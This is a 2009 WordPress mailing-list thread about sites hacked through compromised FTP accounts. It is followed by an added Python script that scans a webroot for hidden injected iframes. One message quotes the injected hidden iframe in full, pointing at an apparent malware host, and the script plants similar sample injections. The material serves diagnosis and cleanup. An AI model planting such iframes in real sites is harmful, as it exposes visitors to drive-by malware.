[wp-testers] Default.widgets.php Hacked? What to do?

Kirk M kmb42vt at gmail.com
Thu Jul 23 22:28:52 UTC 2009


Thankfully I've only gone in using FTP on 2 of them within the 
last 2 months so I (and they) should be okay. Still, I'll have 
to check the files on each of those 2 if not re-upgrade 2.8.2 
altogether just to be safe.

Such is life in the online world.

On 07/23/2009 06:22 PM, Chris Carter wrote:
> you might be in trouble...
>
> On Thu, Jul 23, 2009 at 5:08 PM, Kirk M<kmb42vt at gmail.com>  wrote:
>
>> Clean here so far (2.8.2). Guess I'll be working from Ubuntu to service my
>> sites for awhile rather than Windows at least until I get everything changed
>> around and my Windows partition fully scanned. I have several FTP accounts
>> configured, many are for other site owners who ask me to maintain their WP
>> powered sites. It definitely wouldn't do to have those get hacked.
>>
>>
>> On 07/23/2009 05:50 PM, Chris Carter wrote:
>>
>>> Change your pwds and scan away.. I used cpanel file manager for a while to
>>> make sure they stopped attacking .. looking at logs, it hits and is tagged
>>> with googlebot, but the IPs are strange
>>>
>>> Anyway, This virus looks for files with:
>>>
>>> index*.*
>>> default*.*
>>> main*.*
>>> home*.*
>>>
>>> (I built a static php includes site, and only files named like the above
>>> were affected)
>>>
>>> Also might want to check your CGI-BIN for files that look suspicious
>>>
>>> It's basically a bot that logs in, finds any files in all directories
>>> that start with the above
>>>
>>> ...funny thing was that sometimes where they inject it, PHP code throws
>>> errors. They need to revise their bot to work outside the <? tags :)
>>>
>>> -Chris
>>> 314media.com
>>>
>>> On Thu, Jul 23, 2009 at 4:19 PM, Navjot Singh<navjotjsingh at gmail.com> wrote:
>>>
>>>> Yeah..my Wordpress mu install also got hacked. Just confirmed.
>>>>
>>>> On Fri, Jul 24, 2009 at 2:48 AM, dinu<hello at offlineblog.net>   wrote:
>>>>
>>>>> I had to restore from backup. the entire blog
>>>>> when I first saw Default.widgets.php hacked, I tried restoring only that
>>>>> page. But then I found hidden iframe codes on all of my pages (including
>>>>> pages after login)
>>>>>
>>>>> when I contacted Dreamhost support, they said it was an ftp hack. So, I
>>>>> would think it's not a wordpress issue.
>>>>>
>>>>> On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh<navjotjsingh at gmail.com> wrote:
>>>>>
>>>>>> 2.8.1 at the time of being hacked. Just upgraded to 2.8.2
>>>>>>
>>>>>> On Fri, Jul 24, 2009 at 2:31 AM, Joshua
>>>>>> Dunbar<josh2007 at findingjesustoday.com>   wrote:
>>>>>>
>>>>>>> What version of wordpress are you running?
>>>>>>>
>>>>>>> --------------------------------------------------
>>>>>>> From: "Chris Carter"<carter.chris at gmail.com>
>>>>>>> Sent: Thursday, July 23, 2009 3:43 PM
>>>>>>> To:<wp-testers at lists.automattic.com>
>>>>>>> Cc:<wp-testers at lists.automattic.com>;<wp-hackers at lists.automattic.com>
>>>>>>> Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do?
>>>>>>>
>>>>>>>> I keep getting hacked with that code inserted into admin/default-filters
>>>>>>>>
>>>>>>>> Chris Carter
>>>>>>>> President
>>>>>>>> 314media.com
>>>>>>>> 314-714-5448
>>>>>>>>
>>>>>>>> On Jul 23, 2009, at 3:31 PM, Navjot Singh<navjotjsingh at gmail.com> wrote:
>>>>>>>>
>>>>>>>>> I have a blog running on 2.8.2 and suddenly now I find all index.php
>>>>>>>>> and wp-includes/Default.widgets.php hacked with following code
>>>>>>>>> inserted randomly :
>>>>>>>>>
>>>>>>>>> <iframe src="http://u1j.in:8080/ts/in.cgi?pepsi109" width=125
>>>>>>>>> height=125 style="visibility: hidden"></iframe>
>>>>>>>>>
>>>>>>>>> How to prevent further hacking? I am currently replacing all the files
>>>>>>>>> affected since all of them affected at a certain date. I am on a
>>>>>>>>> shared hosting and only one blog got attacked.
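
Added example (not part of the original thread): a Python sweep of a webroot for the symptom described above, a hidden <iframe> injected into files named index*.*, default*.*, main*.*, or home*.*, with hits sorted by modification time since the thread reports all files changed on one date. The regexes, function names, and the constructed sample tree (placeholder host injected.example) are assumptions for illustration; targets_only=False covers the report of iframes on every page.

```python
import fnmatch
import os
import re
import tempfile

# Name patterns reported in the thread; matched case-insensitively ("Default.widgets.php").
TARGET_GLOBS = ("index*.*", "default*.*", "main*.*", "home*.*")
IFRAME_RE = re.compile(rb"<iframe\b[^>]*>", re.I)
# Attributes that hide a frame: CSS hiding, or a 0/1-pixel width or height.
HIDDEN_RE = re.compile(
    rb"visibility\s*:\s*hidden|display\s*:\s*none|(?:width|height)\s*=\s*[\"']?[01]\b", re.I)

def scan(root, targets_only=True):
    """Return (path, iframe tag, mtime) per hidden iframe, oldest change first."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if targets_only and not any(fnmatch.fnmatchcase(name.lower(), g) for g in TARGET_GLOBS):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
                mtime = os.path.getmtime(path)
            except OSError:
                continue  # unreadable file: skip instead of aborting the sweep
            hits += [(path, t.decode("latin-1"), mtime)
                     for t in IFRAME_RE.findall(data) if HIDDEN_RE.search(t)]
    return sorted(hits, key=lambda h: h[2])

def build_sample_tree():
    """Constructed sample webroot: two injected targets, one benign, one off-pattern."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "wp-includes"))
    bad = b'<iframe src="http://injected.example/%s" width=125 style="visibility: hidden"></iframe>'
    samples = {
        "index.php": b"<?php echo 1; ?>\n" + bad % b"a",
        "wp-includes/Default.widgets.php": b"<?php " + bad % b"b" + b" ?>",
        "home.html": b'<iframe src="/video" width="560" height="315"></iframe>',  # visible embed
        "about.php": bad % b"c",  # injected, but name is outside the reported patterns
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    print(*scan(build_sample_tree()), sep="\n")
```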

